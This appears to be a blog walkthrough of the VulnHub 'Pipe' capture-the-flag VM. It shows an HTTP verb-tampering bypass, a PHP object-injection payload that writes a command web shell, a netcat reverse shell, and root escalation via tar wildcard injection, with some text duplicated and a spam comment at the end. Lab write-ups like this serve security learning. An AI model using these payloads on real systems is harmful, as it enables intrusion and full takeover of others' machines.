Mission : Get the root flag on `Pipe` which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/devrandom-pipe,124/. I quickly loaded up the virtual machine into my VMWare Player and i was good to go !
Detailed Steps for getting root:
I ran a quick nmap scan to identify the Ip address of the Pipe VM. I use `host-only` networking for both my Pipe Vm and Kali box.
We identify the IP address of the new VM as 192.168.28.131 . An nmap scan of the box shows that the box is running services 22,80.
We point our browser to 192.168.28.131:80 but we are asked to provide credentials. Common attempts such as admin:admin, etc fail. We decide to use burpsuite to see if we can play around with the request to the webserver.
We configure our IceWeasel browser to use burp proxy settings 127.0.0.1:8080 so that burp can intercept the request and response to and fro from the webserver. We see that the GET request prompts us for authentication. We decide to change the request from GET to GETS. We are now able to see a page which seems like a wikipedia entry.
We use dirbuster against the webserver and it lists us some interesting files and directories.
Here we invoke the logger class and ask it to create a file called me.txt in the webroot with the contents `howdy rowdy`. We quickly check that our attempt has been successful. Now we can attempt to execute some php commands on the browser. We modify the request to execute phpinfo() command as follows:
We can see that the command was executed in the browser.
Since we can run arbitary command we can attmept to code a reverse shell to our attacking box. Since we can run php commands we use a simple php reverse shell. For this we create a another file in the webroot via the same technique of intercepting the webrequest to the server.
We attempt a reverse shell to our netcat listener on our kali box.
Privilege Escalation
Now that we have root access on the box we run the linuxpriv checker python script. Upon running the script we find that the we have a world writtable home directory for a user called rene
We see that the contents of this file is a zipped backup file which is created and deleted every few minutes. We check for any cronjobs running on the system via cat /etc/crontab which is readable on this box. Interestingly we see a couple of cron jobs running which interest us.
Our attention is drawn to the use of wild cards in the tar command and chown command . We know that these commands can be exploited to elevate privilege . For more details refer to the excellect post by Leon Juranic https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
Escalation Technique via usage of tar command :
The idea is to trick the tar command to execute the script shell.sh at the first checkpoint. Our shell file is a reverse shell. The tar command gets run every 5 min on the box so after a brief wait we get a new shell with the same priv as that of the user who ran the tar command. Luckily in this case its root !
Detailed Steps for getting root:
I ran a quick nmap scan to identify the Ip address of the Pipe VM. I use `host-only` networking for both my Pipe Vm and Kali box.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nmap -sP 192.168.28.0/24 | |
| Starting Nmap 6.47 ( http://nmap.org ) at 2015-12-24 00:36 EST | |
| Nmap scan report for 192.168.28.1 | |
| Host is up (0.00036s latency). | |
| MAC Address: 00:50:56:C0:00:01 (VMware) | |
| Nmap scan report for 192.168.28.131 | |
| Host is up (0.00026s latency). | |
| MAC Address: 00:0C:29:AC:48:C5 (VMware) | |
| Nmap scan report for 192.168.28.254 | |
| Host is up (0.00013s latency). | |
| MAC Address: 00:50:56:FA:84:CA (VMware) | |
| Nmap scan report for 192.168.28.128 | |
| Host is up. | |
| Nmap done: 256 IP addresses (4 hosts up) scanned in 28.04 seconds |
We identify the IP address of the new VM as 192.168.28.131 . An nmap scan of the box shows that the box is running services 22,80.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Nmap scan report for 192.168.28.131 | |
| Host is up (0.00036s latency). | |
| Not shown: 997 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | |
| |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) | |
| 80/tcp open http Apache httpd | |
| | http-auth: | |
| | HTTP/1.1 401 Unauthorized | |
| |_ Basic realm=index.php | |
| |_http-methods: No Allow or Public header in OPTIONS response (status code 401) | |
| |_http-title: 401 Unauthorized | |
| 111/tcp open rpcbind 2-4 (RPC #100000) | |
| | rpcinfo: | |
| | program version port/proto service | |
| | 100000 2,3,4 111/tcp rpcbind | |
| | 100000 2,3,4 111/udp rpcbind | |
| | 100024 1 58073/tcp status | |
| |_ 100024 1 59126/udp status | |
| MAC Address: 00:0C:29:AC:48:C5 (VMware) | |
| Device type: general purpose | |
| Running: Linux 3.X | |
| OS CPE: cpe:/o:linux:linux_kernel:3 | |
| OS details: Linux 3.11 - 3.14 | |
| Uptime guess: 0.462 days (since Wed Dec 23 13:40:14 2015) | |
| Network Distance: 1 hop | |
| TCP Sequence Prediction: Difficulty=257 (Good luck!) | |
| IP ID Sequence Generation: All zeros | |
| Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 0.36 ms 192.168.28.131 |
 |
| Request intercepted by burp |
 |
| We change the request before forwarding to webserver |
 |
| index.php page hosted at the webserver |
We use dirbuster against the webserver and it lists us some interesting files and directories.
 |
| Dirbuster output |
The scriptz directory looks interesting as we can see a couple of files here. The file php.js contains the javascript equivalent of the serialize function. We also see a log.php.BAK file which seems to be a logger file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class Log | |
| { | |
| public $filename = ''; | |
| public $data = ''; | |
| public function __construct() | |
| { | |
| $this->filename = ''; | |
| $this->data = ''; | |
| } | |
| public function PrintLog() | |
| { | |
| $pre = "[LOG]"; | |
| $now = date('Y-m-d H:i:s'); | |
| $str = '$pre - $now - $this->data'; | |
| eval("\$str = \"$str\";"); | |
| echo $str; | |
| } | |
| public function __destruct() | |
| { | |
| file_put_contents($this->filename, $this->data, FILE_APPEND); | |
| } | |
| } | |
| ?> |
It seems that this file will write itself on the webroot directory. This is very interesting to us especially if we can control the `data` field supplied to the file.
Now we go back to our index page and see there is a hyperlink at the bottom of the page which allows us to get some artist information. We also view the page source .
We see that the page includes the php.js file to call the serialize API and pass some arguments to it at line 8. We now intercept the request for additional artist information in burp.
We see that the param field is dynamic content. We send the content to the Decoder tab of burp ( Right Click and choose Send to Decoder tab). At the decoder tab we use the Smart Decoder to decode the param.
It seems that in this case a `Info` type object is being created. We know that a `Log` object will invoke the logger file and allow us to write to the webroot. We now attempt to tweak the request so that we can write some data to the webroot via the Log object.
We encode the request using the URL encoder and then forward it to the webserver. Here is our modified request :
It seems that in this case a `Info` type object is being created. We know that a `Log` object will invoke the logger file and allow us to write to the webroot. We now attempt to tweak the request so that we can write some data to the webroot via the Log object.
We encode the request using the URL encoder and then forward it to the webserver. Here is our modified request :
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/me.txt";s:4:"data";s:11:"howdy%20rowdy";} |
Here we invoke the logger class and ask it to create a file called me.txt in the webroot with the contents `howdy rowdy`. We quickly check that our attempt has been successful. Now we can attempt to execute some php commands on the browser. We modify the request to execute phpinfo() command as follows:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/me.php";s:4:"data";s:19:"<?php phpinfo(); ?>";} |
We can see that the command was executed in the browser.
Since we can run arbitary command we can attmept to code a reverse shell to our attacking box. Since we can run php commands we use a simple php reverse shell. For this we create a another file in the webroot via the same technique of intercepting the webrequest to the server.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| O:3:"Log":2:{s:8:"filename";s:29:"/var/www/html/scriptz/me5.php";s:4:"data";s:41:"<?php%20$cmd%3d$_GET['cmd'];%20system($cmd);%20?>";} |
We attempt a reverse shell to our netcat listener on our kali box.
Privilege Escalation
Now that we have root access on the box we run the linuxpriv checker python script. Upon running the script we find that the we have a world writtable home directory for a user called rene
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| World Writeable Directories for Users other than Root | |
| drwxrwxrwx 2 rene rene 4096 Dec 23 14:59 /home/rene/backup | |
We see that the contents of this file is a zipped backup file which is created and deleted every few minutes. We check for any cronjobs running on the system via cat /etc/crontab which is readable on this box. Interestingly we see a couple of cron jobs running which interest us.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat /etc/crontab | |
| # /etc/crontab: system-wide crontab | |
| # Unlike any other crontab you don't have to run the `crontab' | |
| # command to install the new version when you edit this file | |
| # and files in /etc/cron.d. These files also have username fields, | |
| # that none of the other crontabs do. | |
| SHELL=/bin/sh | |
| PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin | |
| # m h dom mon dow user command | |
| 17 * * * * root cd / && run-parts --report /etc/cron.hourly | |
| 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) | |
| 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) | |
| 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) | |
| # | |
| * * * * * root /root/create_backup.sh | |
| */5 * * * * root /usr/bin/compress.sh | |
| cat //usr/bin/compress.sh | |
| #!/bin/sh | |
| rm -f /home/rene/backup/backup.tar.gz | |
| cd /home/rene/backup | |
| tar cfz /home/rene/backup/backup.tar.gz * | |
| chown rene:rene /home/rene/backup/backup.tar.gz | |
| rm -f /home/rene/backup/*.BAK |
Our attention is drawn to the use of wild cards in the tar command and chown command . We know that these commands can be exploited to elevate privilege . For more details refer to the excellect post by Leon Juranic https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
Escalation Technique via usage of tar command :
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@pipe:/home/rene/backup$ perl -e 'print "a" x 0' > "--checkpoint-action=exec=sh shell.sh" | |
| <ckup$ perl -e 'print "a" x 0' > "--checkpoint-action=exec=sh shell.sh" | |
| www-data@pipe:/home/rene/backup$ perl -e 'print "a" x 0' > "--checkpoint=1" | |
| perl -e 'print "a" x 0' > "--checkpoint=1" | |
| www-data@pipe:/home/rene/backup$ cat shell.sh | |
| cat shell.sh | |
| nc 192.168.28.128 4545 -e /bin/bash | |
| www-data@pipe:/home/rene/backup$ | |
The idea is to trick the tar command to execute the script shell.sh at the first checkpoint. Our shell file is a reverse shell. The tar command gets run every 5 min on the box so after a brief wait we get a new shell with the same priv as that of the user who ran the tar command. Luckily in this case its root !
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nc -lvnp 4545 | |
| listening on [any] 4545 ... | |
| connect to [192.168.28.128] from (UNKNOWN) [192.168.28.131] 51099 | |
| id | |
| uid=0(root) gid=0(root) groups=0(root) | |
| ls |
Brass Made Deluxe Easy Cleaning Proto Pipe Alternative Carburetor Pipe On Sale Now Only $19.99! Paypal secure processing
ReplyDelete